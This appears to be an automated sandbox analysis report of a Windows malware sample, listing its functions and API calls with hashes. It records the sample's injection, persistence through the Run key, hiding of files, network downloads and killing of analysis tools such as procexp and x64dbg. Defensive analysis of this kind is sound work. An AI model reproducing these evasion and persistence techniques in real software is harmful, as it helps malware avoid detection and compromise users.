                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction ID: 044b2b8b916defe0b6324337893b74091a79fa6d855ca652b576477efbaf0fce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80413D3691CA8186E750DF11F44476AFBA0FB84765FB05135EA8987AA8CFFDD448CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C2BFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction ID: d9e3c94c026deb966a677906af12128b7418b0bec79c5c9e0dda099272d6180e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A141F236A0CB8586E7B0DB15F44476ABBA0FB84795F604026EACD83B68DFBDD444CB40
                                                                                                                                                                                                                                                    Function 00007FF7821C1C20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7821C1C5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 4279794846-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction ID: 5154f48ccdf2748770315466adaffbe76556349deacd6af284c57c51886c3dab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71F93A918A8186E7509B51F45432AFB64FBC47A6FB01035FA8A83B68CFBCD445CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C4808 Relevance: 25.7, APIs: 17, Instructions: 166memoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4026551389-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction ID: 73bc46cdd606cf317d93200011cdac563c595663ccd3ff53e3c2aa780360b335
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F81FC36A08B8182EA60DB55F49436ABBA0FBC9BA1F604135DA8D93768DF7CD054CB50
                                                                                                                                                                                                                                                    Function 00007FF7821C2FE0 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C44C8: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C301B), ref: 00007FF7821C4510
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C44C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C301B), ref: 00007FF7821C454D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C44C8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C301B), ref: 00007FF7821C4558
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3A88: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C3020), ref: 00007FF7821C3ACB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3A88: RegSetValueExW.ADVAPI32 ref: 00007FF7821C3B01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3A88: RegCloseKey.ADVAPI32 ref: 00007FF7821C3B10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3B28: RegDeleteKeyW.ADVAPI32 ref: 00007FF7821C3B40
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7821C3D3B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: Process32FirstW.KERNEL32 ref: 00007FF7821C3D6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: CloseHandle.KERNEL32 ref: 00007FF7821C3D80
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: wcscmp.MSVCRT ref: 00007FF7821C3D95
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: OpenProcess.KERNEL32 ref: 00007FF7821C3DAB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: TerminateProcess.KERNEL32 ref: 00007FF7821C3DCE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: CloseHandle.KERNEL32 ref: 00007FF7821C3DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: Process32NextW.KERNEL32 ref: 00007FF7821C3DEF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3D28: CloseHandle.KERNEL32 ref: 00007FF7821C3E01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C38B8: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7821C3A10), ref: 00007FF7821C38E8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00007FF7821C30CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                                    • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                                    • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                                    • Opcode ID: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction ID: cfdcd4f75d4ebdf03f01cd68e9d9dbfedccd443d493093e84cffd1d50087c33f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F214328E18546A4E600BB60F8511F9EA60BF90776FF04531E41DC25F6DEEEE946D370
                                                                                                                                                                                                                                                    Function 00007FF7821C2E30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                                    • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 299056699-189039185
                                                                                                                                                                                                                                                    • Opcode ID: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction ID: a5c20eefe4a7ef5457603b18f2b37ebf0853f47bd779d05b0ecde3cb3ac5c0a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3019E29E0CA0192E760AB11F84426AAF64FBC8B76FB41535DD4EC2A74CEBCD586C610
                                                                                                                                                                                                                                                    Function 00007FF7821C3D28 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                                                    • Opcode ID: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction ID: 2abd027dbacb24f6a5f705472f18e6ee31e55777a0ce222335ddbdc0dc18333b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66213035E0CA8191E770AB11F84837AAB64FBC0766FB04234D95D829B8DFBDD445D710
                                                                                                                                                                                                                                                    Function 00007FF7821C3BE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction ID: 2df4f87c3135b37d681b63598fd8c3815f51fa24bc9a4a23c7e2b8e35ba305cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E31FA76A1CAC485D7709B19F4883AEA7A0F788B51F600136DA8DC3B68DF7CD154DB14
                                                                                                                                                                                                                                                    Function 00007FF7821C3A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                                    • API String ID: 779948276-85274793
                                                                                                                                                                                                                                                    • Opcode ID: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction ID: 40c05ddbcaa616b5e10c31d969126447e32c49efa4130aa0e6269f5c1fb54241
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7701ED7AA18A8086D7509F14F44471ABB64F7847A5FA01225EB8D83B68DFBDC154CF00
                                                                                                                                                                                                                                                    Function 00007FF7821C3F08 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2850635065-0
                                                                                                                                                                                                                                                    • Opcode ID: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction ID: 9d99972c1eb04d82e27f5707e80c31c400e49f66c925df0bd883708fc5c672db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F115135E0C68291E770AB10F44836AE7B0FB84765FB04634D69D82AA8DFBCD404DB10
                                                                                                                                                                                                                                                    Function 00007FF7821C38B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                                    • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                                    • Opcode ID: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction ID: 72ba4876956f9850c7e78e9485983ed06af6dcef95068da0f185bcfbb03a5fb2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3411243692874196D7509B15F44466ABBA0FB847B1F605331F9AE83BF8DFACD184CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C49BF Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCloseFreeHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2328737614-0
                                                                                                                                                                                                                                                    • Opcode ID: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction ID: a1df34c3ff2eeae61925c339aa017198d8ab3a1047e273c7cc6024f8075ac640
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0311266A08B8082DA64DB59F49036AF7A0F7D8BA1F614125EE8DD37A8DE7CD045CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C2ED0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetOpenW.WININET ref: 00007FF7821C1C64
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: Sleep.KERNEL32 ref: 00007FF7821C1C7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetOpenUrlW.WININET ref: 00007FF7821C1CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetOpenUrlW.WININET ref: 00007FF7821C1CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1CF7
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: Sleep.KERNEL32 ref: 00007FF7821C1D02
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: HttpQueryInfoA.WININET ref: 00007FF7821C1D32
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1D41
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1D4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: Sleep.KERNEL32 ref: 00007FF7821C1D57
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1D71
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetOpenUrlW.WININET ref: 00007FF7821C1D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1DB3
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: Sleep.KERNEL32 ref: 00007FF7821C1DBE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: HttpQueryInfoA.WININET ref: 00007FF7821C1DF6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: GetProcessHeap.KERNEL32 ref: 00007FF7821C1E05
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: HeapAlloc.KERNEL32 ref: 00007FF7821C1E1B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C1C20: InternetCloseHandle.WININET ref: 00007FF7821C1E33
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: GetCurrentProcess.KERNEL32 ref: 00007FF7821C404F
